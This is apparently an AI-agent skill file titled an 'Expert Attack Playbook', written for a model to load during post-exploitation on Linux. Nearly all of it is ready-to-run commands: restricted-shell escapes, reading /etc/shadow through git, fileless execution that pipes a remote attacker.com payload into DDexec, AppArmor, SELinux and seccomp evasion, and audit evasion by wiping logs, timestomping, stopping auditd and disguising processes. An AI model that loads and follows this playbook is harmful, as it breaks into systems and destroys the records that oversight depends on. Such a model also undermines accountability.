>-
---
name: linux-security-bypass
description: >-
Linux security mechanism bypass playbook. Use when facing restricted bash/rbash, read-only or noexec filesystems, AppArmor, SELinux, seccomp filters, or audit logging that must be evaded during post-exploitation.
---
# SKILL: Linux Security Bypass — Expert Attack Playbook
> **AI LOAD INSTRUCTION**: Expert techniques for bypassing Linux security mechanisms. Covers restricted shell escape, noexec bypass, AppArmor/SELinux evasion, seccomp circumvention, and audit evasion. Base models miss DDexec, memfd_create fileless execution, and architecture-confusion seccomp bypass.
## 0. RELATED ROUTING
Before going deep, consider loading:
- [linux-privilege-escalation](../linux-privilege-escalation/SKILL.md) once you've broken out of restrictions and need to escalate
- [container-escape-techniques](../container-escape-techniques/SKILL.md) when security mechanisms are container-specific (seccomp profiles, AppArmor docker-default)
- [linux-lateral-movement](../linux-lateral-movement/SKILL.md) after bypassing restrictions for pivoting
- [cmdi-command-injection](../cmdi-command-injection/SKILL.md) when the restriction is on command execution from a web application context
---
## 1. RESTRICTED BASH (rbash) BYPASS
### 1.1 SSH-Based Bypass
```bash
# Force a different shell via SSH
ssh user@host -t "bash --noprofile --norc"
ssh user@host -t "/bin/sh"
ssh user@host -t "bash -l"
# If ForceCommand is set in sshd_config, these may not work
# Try SFTP/SCP instead — often not restricted:
sftp user@host
# SFTP shell can sometimes execute commands
```
### 1.2 Editor-Based Escape
```bash
# vi/vim escape
vi
:set shell=/bin/bash
:shell
# Or: :!/bin/bash
# ed escape
ed
!/bin/bash
# nano (if available)
# Ctrl+R → Ctrl+X → command execution
```
### 1.3 Language Interpreter Escape
| Interpreter | Command |
|---|---|
| Python | `python3 -c 'import pty; pty.spawn("/bin/bash")'` |
| Perl | `perl -e 'exec "/bin/bash";'` |
| Ruby | `ruby -e 'exec "/bin/bash"'` |
| Lua | `lua -e 'os.execute("/bin/bash")'` |
| PHP | `php -r 'system("/bin/bash");'` |
| Node.js | `node -e 'require("child_process").spawn("/bin/bash",{stdio:[0,1,2]})'` |
| AWK | `awk 'BEGIN {system("/bin/bash")}'` |
### 1.4 Environment Variable Tricks
```bash
# Overwrite shell via BASH_CMDS
BASH_CMDS[x]=/bin/bash
x
# Use env to spawn unrestricted shell
env /bin/bash
env -i /bin/bash
# PATH manipulation (if export is allowed)
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
/bin/bash
# If only specific commands are allowed:
# Use allowed command to read files
git log --oneline --all -p # git can read arbitrary files
git diff /dev/null /etc/shadow
```
### 1.5 Other Escapes
| Method | Command |
|---|---|
| `expect` | `expect -c 'spawn /bin/bash; interact'` |
| `script` | `script -qc /bin/bash /dev/null` |
| `rlwrap` | `rlwrap /bin/bash` |
| `nmap` (old) | `nmap --interactive` → `!bash` |
---
## 2. READ-ONLY / NOEXEC FILESYSTEM EXECUTION
### 2.1 DDexec — Execute From stdin via /proc/self/mem
```bash
# DDexec overwrites the running process memory with a new binary
# No file written to disk — completely fileless
# Usage: pipe any ELF binary through DDexec
curl -sL https://attacker.com/payload | bash ddexec.sh
# How it works:
# 1. Opens /proc/self/mem for writing
# 2. Seeks to the text segment of the current process
# 3. Overwrites it with the target ELF binary
# 4. Jumps to the new entry point
```
### 2.2 memfd_create — In-Memory File Descriptor
```python
import ctypes, os
libc = ctypes.CDLL("libc.so.6")
fd = libc.syscall(319, b"", 0) # SYS_MEMFD_CREATE (x86_64)
with open(f"/proc/self/fd/{fd}", "wb") as f:
f.write(open("/path/to/binary", "rb").read())
os.execve(f"/proc/self/fd/{fd}", ["binary"], os.environ) # Bypasses noexec
```
```bash
# Perl variant: syscall(319, "", 0) → write to fd → exec /proc/$$/fd/$fd
```
### 2.3 ld.so Direct Execution
```bash
# Use the dynamic linker to execute from a writable mount
# Even if the binary's partition is noexec, ld.so runs from its own mount
/lib64/ld-linux-x86-64.so.2 /path/on/noexec/mount/binary
# Or from /dev/shm (usually writable + exec):
cp binary /dev/shm/binary
/dev/shm/binary
```
### 2.4 Script Interpreters on noexec
```bash
# Scripts still execute on noexec — only ELF execution is blocked
# The interpreter (python/perl/bash) runs from an exec-allowed mount
# and reads the script as data
python3 /noexec/mount/exploit.py # Works
perl /noexec/mount/exploit.pl # Works
bash /noexec/mount/exploit.sh # Works
# But ./exploit (ELF binary) → "Permission denied"
```
### 2.5 Writable Mount Points
```bash
# Common writable + exec-capable locations:
/dev/shm # tmpfs — almost always writable + exec
/tmp # Sometimes noexec on hardened systems
/var/tmp # Often writable
/run # tmpfs — check permissions
# Check mount options:
mount | grep -E "shm|tmp"
# Look for "noexec" flag — if absent, exec is allowed
```
---
## 3. APPARMOR BYPASS
### 3.1 Profile Enumeration
```bash
# Check AppArmor status
aa-status 2>/dev/null
cat /sys/module/apparmor/parameters/enabled # Y = enabled
cat /sys/kernel/security/apparmor/profiles # List all profiles
# Check current process profile:
cat /proc/self/attr/current
# "unconfined" = no restriction
# "docker-default (enforce)" = Docker's default profile
```
### 3.2 Exploitation Strategies
```bash
# Find unconfined processes (inject via ptrace if root):
ps auxZ 2>/dev/null | grep unconfined
# Complain mode = effectively no restriction (just logging):
aa-status | grep complain
```
Common AppArmor profile gaps: `/proc/self/fd/*` access, abstract Unix sockets, interpreter-based execution (python scripts bypass binary restrictions), and newly created paths.
---
## 4. SELINUX BYPASS
### 4.1 Mode Check
```bash
getenforce # Enforcing / Permissive / Disabled
sestatus # Detailed status
cat /etc/selinux/config # Persistent configuration
# Check current context
id -Z
ps auxZ | head -20
```
### 4.2 Permissive Domain Exploitation
```bash
semanage permissive -l 2>/dev/null # Domains in permissive mode
ps -eZ | grep -i permissive # Processes — can do anything (just logged)
```
### 4.3 Context Transition & Booleans
```bash
ls -Z /tmp/ # File contexts — tmp_t has broader access
sesearch --allow -t unconfined_t 2>/dev/null | head -30 # Transition rules
# Dangerous booleans that weaken SELinux:
getsebool -a | grep -i "on$" | grep -iE "exec|write|network|connect"
# httpd_can_network_connect, allow_execmem
```
---
## 5. SECCOMP BYPASS
### 5.1 Check Seccomp Status
```bash
grep Seccomp /proc/self/status
# Seccomp: 0 = disabled, 1 = strict, 2 = filter
# Docker default seccomp profile blocks ~44 syscalls
# Check what's allowed:
./amicontained # Shows blocked/allowed syscalls
```
### 5.2 Architecture Confusion (x86 vs x86_64)
```bash
# Seccomp filters often only check x86_64 syscall numbers
# x86 (32-bit) syscall numbers are different!
# If the filter doesn't check the architecture:
# Compile a 32-bit binary that uses x86 syscall numbers:
# x86_64 execve = 59, x86 execve = 11
# The filter blocks syscall 59 but not 11
gcc -m32 -static -o exploit32 exploit.c
# If the seccomp filter lacks AUDIT_ARCH_X86 check → bypass
```
### 5.3 Allowed Syscall Abuse & Kernel Bugs
Allowed syscalls to abuse creatively: `sendmsg/recvmsg` (pass FDs between processes), `mmap/mprotect` (executable memory), `process_vm_readv/writev` (cross-process memory).
Known seccomp kernel bugs: CVE-2019-2054 (ptrace bypass), io_uring bypassed seccomp entirely (pre-5.12). Check `uname -r` and compare.
---
## 6. AUDIT EVASION
### 6.1 Timestamp Manipulation
```bash
# Modify file timestamps to hide changes
touch -r /etc/hosts /modified/file # Copy timestamp from reference
touch -t 202301010000.00 /modified/file # Set specific timestamp
# Modify log timestamps (if writable)
# Use timestomping to match surrounding entries
```
### 6.2 Log Tampering & Process Spoofing
```bash
sed -i '/pattern/d' /var/log/auth.log # Remove specific entries
echo "" > /var/log/wtmp # Clear login records
journalctl --rotate && journalctl --vacuum-time=1s # Clear journal
# Process name spoofing (hide in ps output):
exec -a "[kworker/0:0]" /bin/bash # Bash
# C/Python: prctl(PR_SET_NAME, "kworker/0:0", 0, 0, 0)
# Disable audit (if root):
auditctl -e 0 && service auditd stop
```
---
## 7. LINUX SECURITY BYPASS DECISION TREE
```
Security mechanism identified?
│
├── Restricted shell (rbash)?
│ ├── SSH access? → ssh -t "bash --noprofile --norc" (§1.1)
│ ├── Editor available? → vi :!/bin/bash (§1.2)
│ ├── Language interpreter? → python/perl/ruby escape (§1.3)
│ ├── env command? → env /bin/bash (§1.4)
│ └── Allowed commands with escape? → git/man/less → !bash (§1.5)
│
├── noexec filesystem?
│ ├── Script interpreters available? → bash/python/perl scripts work (§2.4)
│ ├── /dev/shm writable + exec? → copy binary there (§2.5)
│ ├── memfd_create available? → fileless execution (§2.2)
│ ├── ld.so accessible? → ld.so /path/to/binary (§2.3)
│ └── Last resort → DDexec via /proc/self/mem (§2.1)
│
├── AppArmor enforcing?
│ ├── Profile in complain mode? → no restriction, just logging (§3.3)
│ ├── Unconfined processes exist? → inject/migrate to them (§3.2)
│ ├── Profile missing path coverage? → use uncovered paths (§3.4)
│ └── Interpreter not restricted? → script-based execution
│
├── SELinux enforcing?
│ ├── Domain set to permissive? → exploit that domain (§4.2)
│ ├── Dangerous booleans enabled? → abuse allowed actions (§4.4)
│ ├── Context transition available? → execute binary with transition (§4.3)
│ └── Kernel CVE? → SELinux bypass exploit
│
├── seccomp filter active?
│ ├── Architecture check missing? → 32-bit syscall confusion (§5.2)
│ ├── Allowed syscalls exploitable? → sendmsg/mmap abuse (§5.3)
│ ├── Kernel bug? → io_uring/ptrace bypass (§5.4)
│ └── Check what's blocked → amicontained (§5.1)
│
└── Audit logging?
├── Writable logs? → delete/modify entries (§6.2)
├── Root access? → disable auditd (§6.4)
├── Need stealth? → process name spoofing (§6.3)
└── File changes tracked? → timestamp manipulation (§6.1)
```
Creator's repository · yaklang/hack-skills